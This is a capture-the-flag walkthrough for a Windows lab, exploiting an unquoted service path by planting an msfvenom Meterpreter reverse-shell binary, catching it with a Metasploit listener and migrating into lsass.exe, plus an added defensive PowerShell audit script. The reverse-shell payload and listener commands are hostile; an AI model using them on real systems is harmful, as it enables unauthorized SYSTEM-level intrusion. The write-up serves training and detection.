sudo nmap -Pn -sV -sS 

3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

RDP Login

Starting out we connect via RDP with the credentials provided by the room.

xfreerdp /v:'' /u:'sage' /p:'gr33ntHEphgK2&V' +clipboard /dynamic-resolution


Now connected to the target system as the user sage, we run PowerUp's Invoke-AllChecks and identify a service binary with an unquoted path that runs in the context of SYSTEM.

Unquoted Service Path

Viewing the file permissions along the path C:\Program Files\Development Files\Devservice Files\Service.exe, we see that we have no permissions over Service.exe itself, but the Users principal can create files within C:\Program Files\Development Files.

This is enough for us to exploit the unquoted service path privilege escalation vector.

Because the service's binary path contains spaces and is not wrapped in quotes, Windows will try the following executables, in order, when the service is started.

  1. C:\Program.exe

  2. C:\Program Files\Development.exe

  3. C:\Program Files\Development Files\Devservice.exe

  4. C:\Program Files\Development Files\Devservice Files\Service.exe

Since we have write access to C:\Program Files\Development Files, we will be targeting option number 3.
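As an added defender-side example (not part of the original writeup), the PowerShell script below audits a host for the condition described above: it finds services whose path is unquoted and contains spaces, lists the candidate binaries in the order Windows tries them, and checks whether broad principals such as Users can create files in each candidate's directory. The principal list, the rights mask and the sc.exe remediation line are my assumptions, not something taken from the room.

```powershell
# Added audit script (not from the original writeup): finds services with an
# unquoted ImagePath containing spaces, lists the decoy binaries Windows would
# try first, and flags directories writable by broad principals. Run elevated.

$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'Everyone', 'NT AUTHORITY\INTERACTIVE')
$FSR = [System.Security.AccessControl.FileSystemRights]
$WriteMask = $FSR::CreateFiles -bor $FSR::CreateDirectories -bor $FSR::Write -bor
             $FSR::Modify -bor $FSR::FullControl

function Get-UnquotedSearchCandidates {
    # Reproduces the lookup order for an unquoted path containing spaces:
    # each space-delimited prefix is tried with ".exe" appended, left to right.
    param([string]$ImagePath)
    if ($ImagePath -match '^\s*([^"]+?\.exe)') { $exePath = $Matches[1] } else { return @() }
    $parts = $exePath -split ' '
    # Prefixes 1..n-1 are the decoys; prefix n is the intended binary itself.
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-BroadWriteAccess {
    # True if any broad principal holds an Allow ACE with create/write rights.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    foreach ($rule in (Get-Acl -LiteralPath $Directory).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band [int]$WriteMask) -ne 0) { return $true }
    }
    return $false
}

foreach ($svc in Get-CimInstance Win32_Service) {
    $path = $svc.PathName
    # Quoted paths and paths without spaces are not affected; skip them.
    if (-not $path -or $path.StartsWith('"') -or $path -notmatch ' ') { continue }
    foreach ($candidate in Get-UnquotedSearchCandidates $path) {
        [pscustomobject]@{
            Service     = $svc.Name
            RunsAs      = $svc.StartName
            Candidate   = $candidate
            DirWritable = Test-BroadWriteAccess (Split-Path -Parent $candidate)
        }
    }
    # Remediation: quote the binary path so only the real file is ever tried, e.g.
    #   sc.exe config <ServiceName> binPath= "\"C:\Program Files\...\Service.exe\""
}
```

Rows where RunsAs is LocalSystem and DirWritable is True are the ones that reproduce this room's finding; quoting the path removes the decoy candidates entirely.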

Building the attack

First, to perform the attack we create a Meterpreter reverse shell payload named Devservice.exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=80 -f exe -o Devservice.exe 

After the payload is built, we upload it to the target system and place it at C:\Program Files\Development Files\Devservice.exe. We do not have permission to restart the service; we do, however, have the ability to restart the target system.

Start a listener with Metasploit.

sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 80; exploit"

Triggering the payload

Then reboot the target system. After a minute or two we should receive a shell back.

For some reason my meterpreter shell would soon die after connecting. As such I migrated to an alternative process (lsass.exe).

Root flag

With confirmed SYSTEM level access I was then able to retrieve the administrator's flag.

